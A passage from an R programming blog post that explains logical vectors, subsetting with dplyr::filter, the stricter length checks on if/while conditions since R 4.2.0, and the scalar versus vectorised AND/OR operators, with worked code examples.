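&lt;p&gt;To make the comparison with an iterative approach concrete, here is a minimal sketch that adds one to every element of a vector in both styles. The variable names are illustrative only.&lt;/p&gt;

```r
x = 1:10

# Vectorised: a single expression acts on every element
vectorised = x + 1

# Iterative: the same result, built one element at a time
iterative = numeric(length(x))
for (i in seq_along(x)) {
  iterative[i] = x[i] + 1
}

identical(vectorised, iterative)
```

&lt;p&gt;Both versions give the same values; the vectorised form simply says it in one line.&lt;/p&gt;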
&lt;p&gt;But the conciseness that R’s vectorised operations provide may trip you
up unexpectedly. A typical case is when you &lt;em&gt;think&lt;/em&gt; you are working with
a &lt;em&gt;scalar&lt;/em&gt; (a length-1 vector) but you are actually working with an
empty or multivalued vector.&lt;/p&gt;
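&lt;p&gt;A small sketch of how that can happen, using a made-up vector of IDs (all names here are hypothetical): &lt;code&gt;which()&lt;/code&gt; returns however many positions match, which may be none or several.&lt;/p&gt;

```r
# Hypothetical data: look up the position of a value in a vector
ids = c(10, 20, 20, 30)

one_match = which(ids == 10)    # a scalar: exactly one position
no_match = which(ids == 99)     # empty: the value is absent
two_matches = which(ids == 20)  # multivalued: the value is repeated

# The length of each result
lengths(list(one_match, no_match, two_matches))
```

&lt;p&gt;Code that assumes each lookup yields exactly one position would only be correct for the first of these.&lt;/p&gt;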
&lt;p&gt;The &lt;code&gt;logical&lt;/code&gt; values in R (&lt;code&gt;TRUE&lt;/code&gt;, &lt;code&gt;FALSE&lt;/code&gt;) are a little bit special. A
vector of logical values might be used to represent some quality in a
dataset, for example, to select those rows of a dataset that are to be
kept in &lt;code&gt;dplyr::filter()&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;tidyverse&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;(diamonds)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 6 × 10&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## carat cut color clarity depth table price x y z&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;dbl&amp;gt; &amp;lt;ord&amp;gt; &amp;lt;ord&amp;gt; &amp;lt;ord&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;int&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 0.23 Ideal E SI2 61.5 55 326 3.95 3.98 2.43&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 0.21 Premium E SI1 59.8 61 326 3.89 3.84 2.31&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 0.23 Good E VS1 56.9 65 327 4.05 4.07 2.31&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 0.29 Premium I VS2 62.4 58 334 4.2 4.23 2.63&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 0.31 Good J SI2 63.3 58 335 4.34 4.35 2.75&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 6 0.24 Very Good J VVS2 62.8 57 336 3.94 3.96 2.48&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;(diamonds&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;cut &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Ideal&amp;#34;&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# A logical vector&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] TRUE FALSE FALSE FALSE FALSE FALSE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(diamonds, cut &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Ideal&amp;#34;&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# Subsetting a data-frame using a logical vector&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 21,551 × 10&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## carat cut color clarity depth table price x y z&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;dbl&amp;gt; &amp;lt;ord&amp;gt; &amp;lt;ord&amp;gt; &amp;lt;ord&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;int&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 0.23 Ideal E SI2 61.5 55 326 3.95 3.98 2.43&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 0.23 Ideal J VS1 62.8 56 340 3.93 3.9 2.46&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 0.31 Ideal J SI2 62.2 54 344 4.35 4.37 2.71&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 0.3 Ideal I SI2 62 54 348 4.31 4.34 2.68&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 0.33 Ideal I SI2 61.8 55 403 4.49 4.51 2.78&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 6 0.33 Ideal I SI2 61.2 56 403 4.49 4.5 2.75&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 7 0.33 Ideal J SI1 61.1 56 403 4.49 4.55 2.76&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 8 0.23 Ideal G VS1 61.9 54 404 3.93 3.95 2.44&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 9 0.32 Ideal I SI1 60.9 55 404 4.45 4.48 2.72&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 10 0.3 Ideal I SI2 61 59 405 4.3 4.33 2.63&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # ℹ 21,541 more rows&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;(diamonds&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;carat &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.3&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] FALSE FALSE FALSE FALSE TRUE FALSE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(diamonds, carat &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.3&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 49,737 × 10&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## carat cut color clarity depth table price x y z&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;dbl&amp;gt; &amp;lt;ord&amp;gt; &amp;lt;ord&amp;gt; &amp;lt;ord&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;int&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 0.31 Good J SI2 63.3 58 335 4.34 4.35 2.75&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 0.31 Ideal J SI2 62.2 54 344 4.35 4.37 2.71&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 0.32 Premium E I1 60.9 58 345 4.38 4.42 2.68&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 0.31 Very Good J SI1 59.4 62 353 4.39 4.43 2.62&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 0.31 Very Good J SI1 58.1 62 353 4.44 4.47 2.59&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 6 0.31 Good H SI1 64 54 402 4.29 4.31 2.75&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 7 0.33 Ideal I SI2 61.8 55 403 4.49 4.51 2.78&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 8 0.33 Ideal I SI2 61.2 56 403 4.49 4.5 2.75&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 9 0.33 Ideal J SI1 61.1 56 403 4.49 4.55 2.76&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 10 0.32 Good H SI2 63.1 56 403 4.34 4.37 2.75&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # ℹ 49,727 more rows&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;But there are places where you use logical values, where it would make
no sense (and could potentially be dangerous) to use a multivalued
logical vector. We use &lt;code&gt;if (...) {}&lt;/code&gt; and &lt;code&gt;while (...) {}&lt;/code&gt; statements for
flow control in R. The conditional expression in these statements (the
&lt;code&gt;...&lt;/code&gt; in &lt;code&gt;if (...) {}&lt;/code&gt;) should always evaluate to a logical scalar:
either &lt;code&gt;TRUE&lt;/code&gt; or &lt;code&gt;FALSE&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;When R 4.2.0 was released, stricter guarantees were placed on the length
of these conditional expressions. We mentioned this in an &lt;a href="https://www.jumpingrivers.com/blog/new-features-r420/" rel="external"&gt;earlier blog
post&lt;/a&gt;. So in
addition to getting an error when the conditional is empty, we now get
an error when the conditional is too long:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Comparison with an empty logical vector:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (&lt;span style="color:#d2a8ff;font-weight:bold"&gt;logical&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;)) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;print&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;I didn&amp;#39;t expect to get here&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Error in if (logical(0)) {: argument is of length zero&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Comparison with an over-sized logical vector:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;numbers &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;print&lt;/span&gt;(numbers &lt;span style="color:#ff7b72;font-weight:bold"&gt;%%&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# Determine if even&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] FALSE FALSE FALSE TRUE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (numbers &lt;span style="color:#ff7b72;font-weight:bold"&gt;%%&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;print&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Should we ever be allowed to get here?&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Error in if (numbers%%2 == 0) {: the condition has length &amp;gt; 1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Previously, R would use the first entry in a non-scalar conditional
vector to decide whether to enter the &lt;code&gt;if&lt;/code&gt; or &lt;code&gt;while&lt;/code&gt; block.&lt;/p&gt;
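&lt;p&gt;One way to avoid this error, assuming you really do mean to ask a question about the whole vector, is to collapse it to a single value with &lt;code&gt;any()&lt;/code&gt; or &lt;code&gt;all()&lt;/code&gt; before it reaches &lt;code&gt;if&lt;/code&gt;. A minimal sketch, reusing the same numbers as above:&lt;/p&gt;

```r
numbers = c(1, 3, 5, 6)
is_even = numbers %% 2 == 0  # a logical vector of length 4

# any() and all() each reduce the vector to a single TRUE or FALSE
if (any(is_even)) {
  print("At least one number is even")
}

if (!all(is_even)) {
  print("Not every number is even")
}
```

&lt;p&gt;Which of the two is appropriate depends on the question being asked; the point is only that the condition handed to &lt;code&gt;if&lt;/code&gt; now has length one.&lt;/p&gt;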
&lt;!--- Compare mtcars$cyl and mtcars$cyl == 4
data.frame(cyl = mtcars$cyl, has_4_cylinders = mtcars$cyl==4)
--&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-whats-new-r43"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="strictly-comparing"&gt;Strictly comparing&lt;/h3&gt;
&lt;p&gt;So, we have two main ways of using a logical vector, one of which now
requires that the vector is a scalar.&lt;/p&gt;
&lt;p&gt;Another place where it is really important to know the length of your
vectors is when combining logical values together.&lt;/p&gt;
&lt;p&gt;R has a number of ways to combine logical values together that build on
the AND and OR operations in Boolean algebra:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;all&lt;/code&gt; and &lt;code&gt;any&lt;/code&gt; for combining the values in a single vector (are
&lt;code&gt;all&lt;/code&gt; of the values TRUE; are &lt;code&gt;any&lt;/code&gt; of the values TRUE)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;&amp;amp;&lt;/code&gt;, &lt;code&gt;&amp;amp;&amp;amp;&lt;/code&gt; (representing “AND”), &lt;code&gt;|&lt;/code&gt;, and &lt;code&gt;||&lt;/code&gt; (for “OR”) for
combining two different vectors&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;is_april &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;is_r_released &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;is_already_tomorrow &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Logical AND within a single vector&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;all&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(is_april, is_r_released, is_already_tomorrow))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] FALSE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Logical OR within a single vector&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;any&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(is_april, is_r_released, is_already_tomorrow))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] TRUE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Logical AND between vectors&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;is_april &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&lt;/span&gt; is_r_released
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] TRUE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;is_april &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; is_already_tomorrow
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] FALSE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Logical OR between vectors&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;is_april &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&lt;/span&gt; is_r_released
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] TRUE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;is_april &lt;span style="color:#ff7b72;font-weight:bold"&gt;||&lt;/span&gt; is_already_tomorrow
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] TRUE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;For scalars, the single-character
operators (&lt;code&gt;&amp;amp;&lt;/code&gt;, &lt;code&gt;|&lt;/code&gt;) and the two-character operators (&lt;code&gt;&amp;amp;&amp;amp;&lt;/code&gt;, &lt;code&gt;||&lt;/code&gt;) return the same value. So
why have a pair of operators for each concept?&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;&amp;amp;&amp;amp;&lt;/code&gt; and &lt;code&gt;||&lt;/code&gt; are intended for use &lt;em&gt;solely&lt;/em&gt; with scalars; they
return a single logical value.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;&amp;amp;&lt;/code&gt; and &lt;code&gt;|&lt;/code&gt; work with multivalued vectors; they return a vector
whose length matches their input arguments (subject to R’s recycling rules).&lt;/li&gt;
&lt;/ul&gt;
&lt;!--- sidenote, sidenote, subject to R's rules for vector recycling --&gt;
&lt;p&gt;Since they always return a scalar logical, you &lt;em&gt;should&lt;/em&gt; use &lt;code&gt;&amp;amp;&amp;amp;&lt;/code&gt; and
&lt;code&gt;||&lt;/code&gt; in your if/while conditional expressions (when needed). If an &lt;code&gt;&amp;amp;&lt;/code&gt;
or &lt;code&gt;|&lt;/code&gt; is used, you may end up with a non-scalar vector inside
&lt;code&gt;if (...) {}&lt;/code&gt; and R will throw an error.&lt;/p&gt;
&lt;p&gt;To illustrate the difference between the scalar operators and vectorised
operators, here’s an example:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;, &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;, &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;, &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;, &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;, &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;, &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The vectorised operators apply AND/OR on matched pairs of elements:&lt;/p&gt;
